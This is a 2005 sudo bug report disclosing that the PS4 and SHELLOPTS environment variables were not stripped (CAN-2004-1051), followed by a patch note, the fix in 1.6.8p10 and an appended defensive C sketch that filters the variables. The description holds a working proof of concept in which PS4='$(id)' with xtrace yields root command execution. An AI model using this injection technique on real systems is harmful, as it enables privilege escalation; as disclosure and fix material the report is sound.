Bug 182 - unstripped variables
Status: RESOLVED FIXED
Product: Sudo
Classification: Unclassified
Component: Sudo
Version: 1.6.8
Hardware: PC Linux
Importance: normal normal
Assigned To: Todd C. Miller
Reported: 2005-06-05 13:40 MDT by Tavis Ormandy
Modified: 2005-10-28 14:39 MDT (History)

Attachments
patch to nix PS4 and SHELLOPTS irt CAN-2004-1051 (216 bytes, patch)
2005-10-27 14:57 MDT, Scott Doty

Description Tavis Ormandy 2005-06-05 13:40:52 MDT
Regarding CAN-2004-1051, I suppose SHELLOPTS should also be stripped for 
completeness.

$ csh # SHELLOPTS is marked readonly in bash.
% setenv SHELLOPTS xtrace
% setenv PS4 '$(id)'
% sudo /any/bash/script
uid=0(root) gid=0(root) groups=0(root)
...
Comment 1 Scott Doty 2005-10-27 14:57:07 MDT
Created attachment 39

patch to nix PS4 and SHELLOPTS irt CAN-2004-1051

Maybe the Mandriva folks should have submitted this... (see bugtraq for
their security notice)

 -Scott Doty <scott@sonic.net>
Comment 2 Todd C. Miller 2005-10-28 12:39:40 MDT
Fixed in sudo 1.6.8p10
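
Added example, not part of the bug report and not sudo's own code: with xtrace turned on through SHELLOPTS, bash expands PS4 before each traced command, so both names have to be gone from the environment before a privileged script starts. The sketch below compacts an environ-style array in place; `strip_unsafe_env`, `env_lookup` and the `unsafe_names` list are hypothetical names chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Names to drop; PS4 and SHELLOPTS are the two from this report.
 * Illustrative list only, not sudo's own table. */
static const char *const unsafe_names[] = { "PS4", "SHELLOPTS", NULL };

/* True when entry is "NAME=value" with exactly this NAME (PS4X != PS4). */
static int entry_has_name(const char *entry, const char *name)
{
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

/* Compact envp in place, dropping every occurrence of a listed name
 * (duplicates included). Returns the number of entries removed. */
size_t strip_unsafe_env(char **envp)
{
    char **src, **dst;
    size_t removed = 0;

    for (src = dst = envp; *src != NULL; src++) {
        int drop = 0;
        for (size_t i = 0; unsafe_names[i] != NULL && !drop; i++)
            drop = entry_has_name(*src, unsafe_names[i]);
        if (drop)
            removed++;
        else
            *dst++ = *src;
    }
    *dst = NULL;
    return removed;
}

/* Value of NAME in envp, or NULL if absent. */
const char *env_lookup(char **envp, const char *name)
{
    for (; *envp != NULL; envp++)
        if (entry_has_name(*envp, name))
            return *envp + strlen(name) + 1;
    return NULL;
}

int main(void)
{
    /* Constructed sample environment. */
    char *envp[] = { "PATH=/usr/bin", "SHELLOPTS=xtrace", "PS4=$(id)", NULL };
    printf("removed %zu\n", strip_unsafe_env(envp));
    return env_lookup(envp, "PS4") != NULL;
}
```

A denylist like this only covers the names it lists; passing a known-good set of variables and dropping everything else avoids having to enumerate each new shell variable.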